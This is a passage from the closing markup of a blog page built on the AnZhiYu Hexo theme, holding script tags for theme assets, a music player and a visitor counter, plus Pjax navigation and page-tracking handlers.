        generateHtml(JSON.parse(data))
      } else {
        getComment()
      }
    }
  }

  newestCommentInit()
  document.addEventListener('pjax:complete', newestCommentInit)
})</script><script async data-pjax src="https://npm.elemecdn.com/anzhiyu-theme-static@1.0.1/bubble/bubble.js"></script><script>var visitorMail = "";
</script><script async data-pjax src="https://cdn.cbd.int/anzhiyu-theme-static@1.0.0/waterfall/waterfall.js"></script><script src="https://lf3-cdn-tos.bytecdntp.com/cdn/expire-1-M/qrcodejs/1.0.0/qrcode.min.js"></script><script src="/js/anzhiyu/right_click_menu.js"></script><link rel="stylesheet" href="https://cdn.cbd.int/anzhiyu-theme-static@1.1.9/icon/ali_iconfont_css.css"><link rel="stylesheet" href="https://cdn.cbd.int/anzhiyu-theme-static@1.0.0/aplayer/APlayer.min.css" media="print" onload="this.media='all'"><script src="https://cdn.cbd.int/anzhiyu-blog-static@1.0.1/js/APlayer.min.js"></script><script src="https://cdn.cbd.int/hexo-anzhiyu-music@1.0.1/assets/js/Meting2.min.js"></script><script src="https://cdn.cbd.int/pjax@0.2.8/pjax.min.js"></script><script>let pjaxSelectors = ["head > title","#config-diff","#body-wrap","#rightside-config-hide","#rightside-config-show",".js-pjax"]
var pjax = new Pjax({
  elements: 'a:not([target="_blank"])',
  selectors: pjaxSelectors,
  cacheBust: false,
  analytics: false,
  scrollRestoration: false
})

document.addEventListener('pjax:send', function () {
  // removeEventListener scroll 
  anzhiyu.removeGlobalFnEvent('pjax')
  anzhiyu.removeGlobalFnEvent('themeChange')

  document.getElementById('rightside').classList.remove('rightside-show')
  
  if (window.aplayers) {
    for (let i = 0; i < window.aplayers.length; i++) {
      if (!window.aplayers[i].options.fixed) {
        window.aplayers[i].destroy()
      }
    }
  }

  typeof typed === 'object' && typed.destroy()

  //reset readmode
  const $bodyClassList = document.body.classList
  $bodyClassList.contains('read-mode') && $bodyClassList.remove('read-mode')
})

document.addEventListener('pjax:complete', function () {
  window.refreshFn()

  document.querySelectorAll('script[data-pjax]').forEach(item => {
    const newScript = document.createElement('script')
    const content = item.text || item.textContent || item.innerHTML || ""
    Array.from(item.attributes).forEach(attr => newScript.setAttribute(attr.name, attr.value))
    newScript.appendChild(document.createTextNode(content))
    item.parentNode.replaceChild(newScript, item)
  })

  GLOBAL_CONFIG.islazyload && window.lazyLoadInstance.update()

  typeof panguInit === 'function' && panguInit()

  // google analytics
  typeof gtag === 'function' && gtag('config', '', {'page_path': window.location.pathname});

  // baidu analytics
  typeof _hmt === 'object' && _hmt.push(['_trackPageview',window.location.pathname]);

  typeof loadMeting === 'function' && document.getElementsByClassName('aplayer').length && loadMeting()

  // prismjs
  typeof Prism === 'object' && Prism.highlightAll()
})

document.addEventListener('pjax:error', e => {
  if (e.request.status === 404) {
    pjax.loadUrl('/404.html')
  }
})</script><script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><script charset="UTF-8" src="https://cdn.cbd.int/anzhiyu-theme-static@1.1.5/accesskey/accesskey.js"></script></div><div id="popup-window"><div class="popup-window-title">通知</div><div class="popup-window-divider"></div><div class="popup-window-content"><div class="popup-tip">你好呀</div><div class="popup-link"><i class="anzhiyufont anzhiyu-icon-arrow-circle-right"></i></div></div></div></body></html>